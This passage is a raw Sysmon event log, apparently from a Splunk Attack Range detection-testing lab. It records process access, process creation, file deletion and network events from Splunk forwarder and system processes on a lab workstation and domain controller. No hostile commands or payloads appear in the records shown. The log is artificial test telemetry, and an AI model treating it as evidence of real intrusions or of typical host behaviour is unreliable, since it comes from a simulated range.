ystem32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222472Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:51.259{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222471Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:51.259{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222470Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:51.259{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222469Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:51.259{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222468Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:51.259{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-190B-6216-3F05-000000003902}1000C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000222467Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:51.259{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-190B-6216-3F05-000000003902}1000C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000222466Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:51.260{4F8D34B0-190B-6216-3F05-000000003902}1000C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000222465Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:51.056{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B09D5DDB97E8F26C6EFF6B4E7004A9B,SHA256=067DDD85AC70E8BA8CD437C588348D1C163005103EBCAE027FF3FEE555EFFA5A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298604Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:52.831{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DABB4D81D5C986C8A7EB76AFAC06D8DD,SHA256=0E26996ADB1A8978610CD7FB6D63DF57FA5A631976A0A3E4ACC7ECEA6B4BABDB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222480Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:52.478{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E28E42475110EA2E990FF695F0AA0194,SHA256=4E464791457355CB03173E246D74746310E3A06706CDCA9F53498A4270F08DB6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222479Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:52.072{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A477DC5C2DE8E5D376F70B4C932CAAF8,SHA256=7D9ABBBC0219295AB0E57A90802B237802C8E49F57D36531EB839E4BCA4C3EF0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000298606Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:51.695{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49546-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000298605Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:53.846{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2BCD5EF18A68EB1B64A852007205184E,SHA256=D778180A3F3A407EA73BD99D2F0F5BFB115485DD651E73152C8CE2588D3F0832,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222481Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:53.290{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E85671ABD52EF91BBD1BC6263880DF0F,SHA256=E96248DDEE021F54672A7ED3E28F12E010C0F65FD59A663427FF4F20D244E74E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298607Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:54.861{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C60A9D234D754FD68D9B5A3E2CD95B5,SHA256=9495B69ACA2C6ADCAE0495586B3EEF27694F4F14A28C2CE0198DAE57CA47CE2A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222482Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:54.290{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D238AF6B04A5152B5600E212C68119B1,SHA256=B23E139D0E75495481CF0C49E0085663ABA8BA8942794F78B1DE312DCD9C488C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222484Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:55.509{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1418CE11CC8028E1BD23DEB71BF2BFDD,SHA256=9A99B43D44EE964DF23C9E33C01242050ADE84759AD3AB713DC01138175B16E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298608Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:55.876{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA9B6A5E8A94FD86E1873352E5DE9395,SHA256=27895A1180DFDC2925B939D8B0635E7755013C732B821EBA465C1FFC4361B0E2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000222483Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:52.574{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51718-false10.0.1.12-8000- 23542300x8000000000000000222485Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:56.603{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B07E69118B14EF68C3D89A6069B24098,SHA256=FCC390E1AFA6544AD7D03B5441ED588727E2072A22E0785717CD03E251946722,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298609Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:56.896{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=15A09A7761BE7D271705EA22131EC09A,SHA256=8B6920E9C896FC779C1D660CC0876FBC0BA7A4D21D963F5A119A98A63B1870AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298610Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:57.914{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7AE1DD4D5D91919A95B685C739A38394,SHA256=798D5A2723A2D4A960605EDC777B18D065B7ECA91979901F32F2677F28DB9F9B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222486Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:57.821{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C9B2740A1F185007EA275071194906A7,SHA256=E96EBC37E3C49A8A2891DCEC7D6C04E259A18794744CF33B1B5454B4C836583D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298611Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:58.929{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=052CAAF3FE9A1534FE4B82E39FEB4A7C,SHA256=6E016723BB2FDB73BF9EEBE957A7A93B8EB7045BC6BED0CB65AACF92D2076A78,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222487Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:58.837{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A43591DD9937267F01E6EB57464059D5,SHA256=AC3A128C807BEBF3DFBA142474679F609CC7C8377A58F6FC8F6D6B7F22AD87B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222488Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:59.868{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD8528EB6E97EBAE99FE8E2C8F0D091E,SHA256=4FE527DB30B403B05B56D08BA73D1FF72D62AE16482A30FDC4A88D5843B04A96,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298613Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:59.944{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=93BB061FE1C3AE9781CB69F5C2D6F615,SHA256=70F9C6F06E995A5C64C64B04B278F63FDAF1FAF4692A9371874B342CC7E17357,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000298612Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:56.709{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49547-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000298614Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:00.944{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF69C212B159B8AF2C6A89DC683ED23B,SHA256=8DA813C4A3BDD65DCE9283C8D7A7E7CCE4FBB6C9B824701BF3FF600964B82C44,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222489Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:00.931{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55E4D762A5DCD4833B1268D3F7AC48F1,SHA256=CFAE678D9108B93C93BF5A05CDFD069C84FCF8A3F9664F4DF3ABC9F6612966E2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298623Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:01.945{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=720B9BE2EF52BD0F67EDCCCA3249EB7D,SHA256=A73D91EB0D046F37D17E679733E7E5EAF633F986305133B133355DEE6F07B3E0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000298622Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:01.430{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1915-6216-5A07-000000003802}3164C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298621Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:01.430{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298620Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:01.430{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298619Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:01.430{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298618Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:01.430{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298617Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:01.430{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-1915-6216-5A07-000000003802}3164C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000298616Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:01.430{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1915-6216-5A07-000000003802}3164C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 